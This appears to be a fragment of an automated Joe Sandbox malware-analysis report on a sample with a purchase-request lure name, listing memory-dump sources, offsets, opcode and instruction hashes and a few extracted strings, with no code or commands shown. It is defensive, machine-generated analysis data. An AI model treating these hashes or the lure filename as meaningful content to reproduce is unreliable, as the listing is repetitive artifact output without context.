• Instruction ID: d6b67ee3cca811baa44cb9add825620f2d9ba498559192feab24b314227ed431
• Opcode Fuzzy Hash: f21a519627470e3e30b28f04bc77abd1cf64f4b6f147297c151c4bf4c89abf1f
• Instruction Fuzzy Hash: 5C21F1B1A04200DFDB55DF58D884B16BBA5EF84718F20C56ADD0A4B367C33AD407CA61
Memory Dump Source
• Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1bcd7d5eb5a94d2a59dd3f843458b2e060e48cb35d9362f6d06e287ba0115a93
• Instruction ID: 585e035bfce5762fbb8045781c15be3d2f10d803536be5a24d925365a445060c
• Opcode Fuzzy Hash: 1bcd7d5eb5a94d2a59dd3f843458b2e060e48cb35d9362f6d06e287ba0115a93
• Instruction Fuzzy Hash: CF1187387002148B9BD56B39985423E76BB9FC5555B08442ADB07CB390DF36CC82CF96
Memory Dump Source
• Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 8bbf5bb8187c6e6b4d892f528cf4bcaae22bf77dc7cfd02db1a3c8a9e0ff97ef
                                                                                                                                                                                                • Instruction ID: bc2c0b95fef8d802686853952594e7b88bbe46199ece23a6a3243e7bd11646b7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8bbf5bb8187c6e6b4d892f528cf4bcaae22bf77dc7cfd02db1a3c8a9e0ff97ef
                                                                                                                                                                                                • Instruction Fuzzy Hash: 613127302006108FC765DB28C458BA6B7E6FF89711F1585A9E15ECB361CF70A88A8B40
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: d197ce23eb24b5ffe219467d42357ca49b9e345f1ad093689f496e48c1908291
                                                                                                                                                                                                • Instruction ID: 639911690cc2600c38913c8431b7f6eefd927ea95b692c3a5f696888ff96c406
                                                                                                                                                                                                • Opcode Fuzzy Hash: d197ce23eb24b5ffe219467d42357ca49b9e345f1ad093689f496e48c1908291
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8821FB7190021D9FDB05DFE9C8A15EEBBB2FF88700F108529D1126B664DA355E858B91
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 4beed721a72be62e44e19f2cc889be87a2405f1849f6a65c3d321d41fa37194c
                                                                                                                                                                                                • Instruction ID: 837d504755afbe787b4fb1abbee22bf05d323cb705932aabaafbd0be2b164e78
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4beed721a72be62e44e19f2cc889be87a2405f1849f6a65c3d321d41fa37194c
                                                                                                                                                                                                • Instruction Fuzzy Hash: FA21F4B4C06208DFCB11DFB4E4182ADBFB0EF0A306F2495AED445A7250D7758A81CFA1
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: cc340936d7720dee6309b1146f4efc5e4508d45af8ba50bded623294e815d9d5
                                                                                                                                                                                                • Instruction ID: f6972aa99fbe9c278182531a75b2cc7c1a265dedcccb9d94c58ed1d357e743f7
                                                                                                                                                                                                • Opcode Fuzzy Hash: cc340936d7720dee6309b1146f4efc5e4508d45af8ba50bded623294e815d9d5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 46212134919385EFC705DFB8D8190CDBFB3EF4A201B2490A7C545D7265EA388A02C721
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 497b4f4ec4b31dfc1cadb815cd4b2181891efc6b4c81f46fd5c23d400216ea6c
                                                                                                                                                                                                • Instruction ID: ec5689baf7be06425ba206d67f09dba0ac149f98943f683d583ff8b3d7b5e382
                                                                                                                                                                                                • Opcode Fuzzy Hash: 497b4f4ec4b31dfc1cadb815cd4b2181891efc6b4c81f46fd5c23d400216ea6c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 26215774A012499FCB05CFA5E550AEEBFF7EF48302F148069E951A6250EB34D981DF20
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 1a6ad41858bc349d16850a31a01ab29f2fa525db5a659f160885f108cf96f012
                                                                                                                                                                                                • Instruction ID: ce2843e086a4926024accc488c7755f50e87a381ca939598a5519e9de7f1f84c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a6ad41858bc349d16850a31a01ab29f2fa525db5a659f160885f108cf96f012
                                                                                                                                                                                                • Instruction Fuzzy Hash: E5214874E05208AFDB04DFA9D98499DFBF2EF88300F14C8AAD519A7365D7309A01CB40
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: dea1b5c889615f898958f38e60ffb79f8eec365271b6fb396d280053a700af5f
                                                                                                                                                                                                • Instruction ID: c81b6cefa94aa51468b8cc317d0dc800cec008b9cb5b8f19e0420b3f324d7417
                                                                                                                                                                                                • Opcode Fuzzy Hash: dea1b5c889615f898958f38e60ffb79f8eec365271b6fb396d280053a700af5f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F11E131B046249FDB25AF28D4487AAFBA2FB84721F14816FED4587240CB30D882CB91
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 7988c5c67e28792400f5486b3943ab9c23420014e8a00dafd9a5fe8c6009bf21
                                                                                                                                                                                                • Instruction ID: 18c2b568723563eec5ba39db763302c076b2620ae7c9779d6b6699781cb4cb2a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7988c5c67e28792400f5486b3943ab9c23420014e8a00dafd9a5fe8c6009bf21
                                                                                                                                                                                                • Instruction Fuzzy Hash: B0115C7030D3A41FD31606799C1466BFF9AAFCB221F1884BBE145C72DBCE288C028365
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 995abcc254c90452dc74e59b9b00efc6dd762e3875faec34a494661b52141368
                                                                                                                                                                                                • Instruction ID: 574577d69267f09685a13b3f684f2990f31d60fba33d996a240cffef1c54a21f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 995abcc254c90452dc74e59b9b00efc6dd762e3875faec34a494661b52141368
                                                                                                                                                                                                • Instruction Fuzzy Hash: BE219D31900218DFCB29CF58D944BEABBF1FB58324F00816EE54A9B212E3759A46CB90
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2462566823.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_145d000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: de4ad25dbef4b20fc4ca792f6d7c6a384e3c6c604d24c2025c28d57fde195294
                                                                                                                                                                                                • Instruction ID: 4ad21e152e53f769e832d3b2c7e6ec476ec04c8e85c9d873c4d5c254ac7d569b
                                                                                                                                                                                                • Opcode Fuzzy Hash: de4ad25dbef4b20fc4ca792f6d7c6a384e3c6c604d24c2025c28d57fde195294
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 736cc14f357fe6184414b05a8b75e59f28cfd63b882ed7e8000ae5b9c6a53c1c
                                                                                                                                                                                                • Instruction ID: 952da0dfe5d9eda1d1508f1fcb1f769864691041ceda456e7f363be2a5a541df
                                                                                                                                                                                                • Opcode Fuzzy Hash: 736cc14f357fe6184414b05a8b75e59f28cfd63b882ed7e8000ae5b9c6a53c1c
                                                                                                                                                                                                • Instruction Fuzzy Hash: F9019239600108CFCB54DF68D58499C7BB5FF48325F254199E916AB3A1C732ED85CF50
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 657afc2af1621e4d22bb17d1f16aff81ad14a0dce22c6171afdc0c41f5e62cec
                                                                                                                                                                                                • Instruction ID: fa512a9b205753d6a7179b06fd9f7d8150b2aba4dcce4d21cddb605039a9ba6e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 657afc2af1621e4d22bb17d1f16aff81ad14a0dce22c6171afdc0c41f5e62cec
                                                                                                                                                                                                • Instruction Fuzzy Hash: 34F01DB5E1030AAFDB44DFA9C945BAEBFF5BB08300F104969E514E7342D7749601CB94
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: c2dece727dc072e8152eaf4d0c596f67c9da72a30e50a330181405490c65f809
                                                                                                                                                                                                • Instruction ID: aabf9ed9f93f6ba8322c55359bb35730cab2ad895858d7419ca50b41a09efe49
                                                                                                                                                                                                • Opcode Fuzzy Hash: c2dece727dc072e8152eaf4d0c596f67c9da72a30e50a330181405490c65f809
                                                                                                                                                                                                • Instruction Fuzzy Hash: 06E065723497A26FC7071A15AC204FE7F674FD5122709406BF855CB192CA65CA1253A1
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: f688e24a28d9f9fc8d01dbc90b00aa7c08aca4a1ab9238abc36d1657e1aab083
                                                                                                                                                                                                • Instruction ID: bbf8f1ad806b5a9a9dc2c9ae1a04277c29f2ce09f6fd25deff7ddd8511c22243
                                                                                                                                                                                                • Opcode Fuzzy Hash: f688e24a28d9f9fc8d01dbc90b00aa7c08aca4a1ab9238abc36d1657e1aab083
                                                                                                                                                                                                • Instruction Fuzzy Hash: 00F0DAB0D0430A9FDB84DFA9C841AAEBBF5FB48700F1045AAD518E7341D7709A008BD4
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: c2157e388e73ad88befba4e72f4203335ef20aa8f5a6b1e84e6596cccb114589
                                                                                                                                                                                                • Instruction ID: 86f12c6117125056f40a38102eeac4143dc7ae70b25a70f292ebfb01a3e27b8a
                                                                                                                                                                                                • Opcode Fuzzy Hash: c2157e388e73ad88befba4e72f4203335ef20aa8f5a6b1e84e6596cccb114589
                                                                                                                                                                                                • Instruction Fuzzy Hash: C2E06535304255BB4F461F5998148FF7F6BDFD8222704842AFC55C6251CA31C92197A1
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 6ab8e93b74ec74168cfe8a84fb28e68b4aeefbe9e6cb85b70dbee33de03aa879
                                                                                                                                                                                                • Instruction ID: b1d3c3a2f2048e363e539ee81ef137a4b8df83ee9ca111178e8389e27ef17820
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ab8e93b74ec74168cfe8a84fb28e68b4aeefbe9e6cb85b70dbee33de03aa879
                                                                                                                                                                                                • Instruction Fuzzy Hash: 34E06DB1D0020AAFD740EF79C90968EBBF1FF08600F11846AD019EB211E7709A418F96
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 7ca4093bad10b46fba1b06c8bcd547732b885928e5f44ddbadde0e9594282410
                                                                                                                                                                                                • Instruction ID: 453c00256f2ce172098bee53c462176ebe3a40807b446ffb8f8d424747d4a205
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ca4093bad10b46fba1b06c8bcd547732b885928e5f44ddbadde0e9594282410
                                                                                                                                                                                                • Instruction Fuzzy Hash: 95E08631A1064057D394961AA8487AB7B9ED7C4660F58846EE54AC3240CE654843CB94
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 443eb98bb39f5436f28c4574517cd82c17749e6ba8124ddedd2a8cd1feba239e
                                                                                                                                                                                                • Instruction ID: 422cacb52b780ab9f38928849b667bf782c4c6b1c01c3e94251b6275e0aec065
                                                                                                                                                                                                • Opcode Fuzzy Hash: 443eb98bb39f5436f28c4574517cd82c17749e6ba8124ddedd2a8cd1feba239e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4EF0BDB4C0126DCFCB68CF60C946BE9BBB1BF09301F1054D9D64AA6254DB755B81CF90
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 7e3dd5fdce527882b4693276b797c1697da16357161ade3f46001e6baec67cb8
                                                                                                                                                                                                • Instruction ID: 79adda3f16ce6515a4c4701bf2c813fd562e78ed48f63e29bcea50a904020681
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e3dd5fdce527882b4693276b797c1697da16357161ade3f46001e6baec67cb8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 73D05E3270425013D399526AA8086AB7B9F8BC9660F0880AAE54A833409D655C428794
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
• Opcode ID: ef93bf16982a0e3c046eeaf036a3f1f4a026f6b4f2f35b1e29f1527fe59e5510
• Instruction ID: 9987b3959be54a5ce57e0b85a98a9f12605503060886e96e1cbfb3e9192da601
• Opcode Fuzzy Hash: ef93bf16982a0e3c046eeaf036a3f1f4a026f6b4f2f35b1e29f1527fe59e5510
• Instruction Fuzzy Hash: 8FE092B0D4060A9FD780EFA9CA05A9EBBF5AB08600F1185A9D019EB312E7749A058F95
Memory Dump Source
• Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b9625d5572a0f8fd92760af487263a1903b2c2793288d69fc7a50e82bf575b3e
• Instruction ID: bfe5863f786ae44422806dc8e35a2c9e2a1f2b0866f88a5571b5d7813807b430
• Opcode Fuzzy Hash: b9625d5572a0f8fd92760af487263a1903b2c2793288d69fc7a50e82bf575b3e
• Instruction Fuzzy Hash: EAD0C23050C3654FC342E72AE8184197BA7EFA1201300C595A0080A52ECAB81CD48390
Memory Dump Source
• Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5942602265d6316960d59d3efe5ab4e367a59f3f8410077c178b985dac7e50d0
• Instruction ID: dc6e7d7b4e72d7b888b92ed494207960f2dfe8a9c9046c6d3a2fb4b904b82dca
• Opcode Fuzzy Hash: 5942602265d6316960d59d3efe5ab4e367a59f3f8410077c178b985dac7e50d0
• Instruction Fuzzy Hash: F8D0A731B142944BDBA1CB3878140AD7BA6EFD373D714027ED7A1D7492CA764413EB54
Memory Dump Source
• Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ca68cf621c075a64f0743b899c7fbb146cbaef3f9a1bf029818e010af2031897
• Instruction ID: 03a8b2f0aa1af5021a932f4ae37dc7845b7c9ca1e83ad6529623adb1d0386ae1
• Opcode Fuzzy Hash: ca68cf621c075a64f0743b899c7fbb146cbaef3f9a1bf029818e010af2031897
• Instruction Fuzzy Hash: E5C0123134052453C544A74C781569D378D6785660F881519D417CB141CB950A024BCA
Memory Dump Source
• Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9ba3e96ba4f90e082a0349c3a5920d0ff5ae5e883d86ebe0e967d7ff3472a8ff
• Instruction ID: f924a5ee41d2bd25f39445ad6e21a6f3114d4a8bc09db1de49d01de15cf89a26
• Opcode Fuzzy Hash: 9ba3e96ba4f90e082a0349c3a5920d0ff5ae5e883d86ebe0e967d7ff3472a8ff
• Instruction Fuzzy Hash: 1AD0123724F2916FD70585B8B8918C6BF74F45213130D40ABC584C6483C11A5419CB75
Memory Dump Source
• Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ddd9c3018573f2efcda4c4070160537dc43e4440f1349d1fb8dae88010be0e53
• Instruction ID: d6c77afdedc6a7bcf0dba9afad9635aa175c95b1c1d557d7aca3cd6982972d1f
• Opcode Fuzzy Hash: ddd9c3018573f2efcda4c4070160537dc43e4440f1349d1fb8dae88010be0e53
• Instruction Fuzzy Hash: 95C012302143394BC641E766E85995977ABFBA0602740D914A0090611DDEF81CD44790
Memory Dump Source
• Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1039dab77c4fe6ff92057923b304ef34073ab4f864c35f12baf3eb434c461009
• Instruction ID: a294d18d83b9b3038b167be4238c796224f5ed310b926092f1dded9e58b521d7
• Opcode Fuzzy Hash: 1039dab77c4fe6ff92057923b304ef34073ab4f864c35f12baf3eb434c461009
• Instruction Fuzzy Hash: 99C0125684E3D15FCF035B2018220CB3F721D13300B0912C7E8848B1A3D1285A1AC3A3
Memory Dump Source
• Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fc1654c1642056d72bede77be034cc3a725bbe65f35ae403a57039d87b5cb238
• Instruction ID: 8cde79b155f5386bb4d2b7c79ba9475916e32ef7b28f4662f6cab7fccd2c50c5
• Opcode Fuzzy Hash: fc1654c1642056d72bede77be034cc3a725bbe65f35ae403a57039d87b5cb238
• Instruction Fuzzy Hash: B8B0122334453813084971DD3C208BF728D49859B0308046BE50DCF3408D851E5143DF
Memory Dump Source
• Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 944400b864705aaab04cecbf3146c66fd3d60bac6ce560184deee3ac924951a3
• Instruction ID: efcb5472800ba4c0512d84c0f5359ce319e298065cd3705859720eea57727cbb
• Opcode Fuzzy Hash: 944400b864705aaab04cecbf3146c66fd3d60bac6ce560184deee3ac924951a3
• Instruction Fuzzy Hash: 3AA0021678022815FA98B9BA3C617BE520B97C0A65F04846AF66DDD5C4CC7A489113C9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID: (bq$Hbq$Hbq$Hbq$Hbq$Hbq$Hbq$PH^q
• API String ID: 0-3076519024
• Opcode ID: e3fec15e4336d3759b667477aa84c6b9302a56e55d65fc93fecd3244658cebb5
• Instruction ID: 34c38b86cc392410a701ccac1137c65afb6154b3d0b68cf82282e90a2cc27d2d
• Opcode Fuzzy Hash: e3fec15e4336d3759b667477aa84c6b9302a56e55d65fc93fecd3244658cebb5
• Instruction Fuzzy Hash: 9162AF30B102148FDB94AB78C85466E7BA6FFC8711F248569E51ADB3A1CF34DD42CB91
Strings
Memory Dump Source
• Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID: #HBF$#HBF
• API String ID: 0-136798975
• Opcode ID: 4f2af02287b34015a67c26258954a4be63fab7128567fd72359c100851587d77
• Instruction ID: 26fc32a53e50623127b8e516a51670545eaefb77bd53a63ae297721fe873cf53
• Opcode Fuzzy Hash: 4f2af02287b34015a67c26258954a4be63fab7128567fd72359c100851587d77
